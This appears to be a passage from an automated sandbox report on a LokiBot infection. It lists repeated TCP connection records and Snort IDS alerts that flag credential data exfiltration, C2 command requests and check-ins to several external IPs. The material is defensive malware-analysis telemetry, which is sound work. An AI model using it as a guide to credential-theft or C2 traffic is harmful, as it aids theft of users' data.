Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:80
Source: global traffic TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:80
Source: global traffic TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:80
Source: global traffic TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:80
Source: global traffic TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.96.9:80
Source: global traffic TCP traffic: 188.114.96.9:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.96.9:80
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.96.9:80
Source: global traffic TCP traffic: 188.114.96.9:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.96.9:80
Source: global traffic TCP traffic: 188.114.96.9:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 188.114.96.9:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 188.114.96.9:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.96.9:80
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.96.9:80
Source: global traffic TCP traffic: 188.114.96.9:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.114.97.3:80
Source: global traffic TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.114.97.3:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.114.97.3:80
Source: global traffic TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.114.97.3:80
Source: global traffic TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.114.97.3:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.114.97.3:80
Source: global traffic TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 188.114.97.3:80
Source: global traffic TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 188.114.97.3:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 188.114.97.3:80
Source: global traffic TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 188.114.97.3:80
Source: global traffic TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 188.114.97.3:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 188.114.97.3:80
Source: global traffic TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:80
Source: global traffic TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:80
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:80
Source: global traffic TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:80
Source: global traffic TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:80
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:80
Source: global traffic TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 188.114.96.3:80
Source: global traffic TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49169
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 188.114.96.3:80
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 188.114.96.3:80
Source: global traffic TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49169
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 188.114.96.3:80
Source: global traffic TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49169
Source: global traffic TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49169
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 188.114.96.3:80
Source: global traffic TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49169
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 188.114.96.3:80
Source: global traffic TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49169
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 188.114.97.9:80
Source: global traffic TCP traffic: 188.114.97.9:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 188.114.97.9:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 188.114.97.9:80
Source: global traffic TCP traffic: 188.114.97.9:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 188.114.97.9:80
Source: global traffic TCP traffic: 188.114.97.9:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 188.114.97.9:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 188.114.97.9:80
Source: global traffic TCP traffic: 188.114.97.9:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 188.114.97.9:80
Source: global traffic TCP traffic: 188.114.97.9:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 188.114.97.3:80
Source: global traffic TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 188.114.97.3:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 188.114.97.3:80
Source: global traffic TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 188.114.97.3:80
Source: global traffic TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 188.114.97.3:80
Source: global traffic TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 188.114.97.3:80
Source: global traffic TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:80
Source: global traffic TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:80
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:80
Source: global traffic TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:80
Source: global traffic TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49172

Networking

barindex
Source: Traffic Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.22:49164 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49164 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49164 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.22:49164 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49164 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.22:49165 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49165 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49165 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.22:49165 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49165 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49166 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49166 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49166 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49166 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49166 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49167 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49167 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49167 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49167 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49167 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49168 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49168 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49168 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49168 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49168 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49169 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49169 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49169 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49169 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49169 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49170 -> 188.114.97.9:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49170 -> 188.114.97.9:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49170 -> 188.114.97.9:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49170 -> 188.114.97.9:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49170 -> 188.114.97.9:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49171 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49171 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49171 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49171 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49171 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49172 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49172 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49172 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49172 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49172 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49173 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49173 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49173 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49173 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49173 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49174 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49174 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49174 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49174 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49174 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49175 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49175 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49175 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49175 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49175 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49176 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49176 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49176 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49176 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49176 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49177 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49177 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49177 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49177 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49177 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49178 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49178 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49178 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49178 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49178 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49179 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49179 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49179 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49179 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49179 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49180 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49180 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49180 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49180 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49180 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49181 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49181 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49181 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49181 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49181 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49182 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49182 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49182 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49182 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49182 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49183 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49183 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49183 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49183 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49183 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49184 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49184 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49184 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49184 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49184 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49185 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49185 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49185 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49185 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49185 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49186 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49186 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49186 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49186 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49186 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49187 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49187 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49187 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49187 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49187 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49188 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49188 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49188 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49188 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49188 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49189 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49189 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49189 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49189 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49189 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49190 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49190 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49190 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49190 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49190 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49191 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49191 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49191 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49191 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49191 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49192 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49192 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49192 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49192 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49192 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49193 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49193 -> 188.114.97.3:80
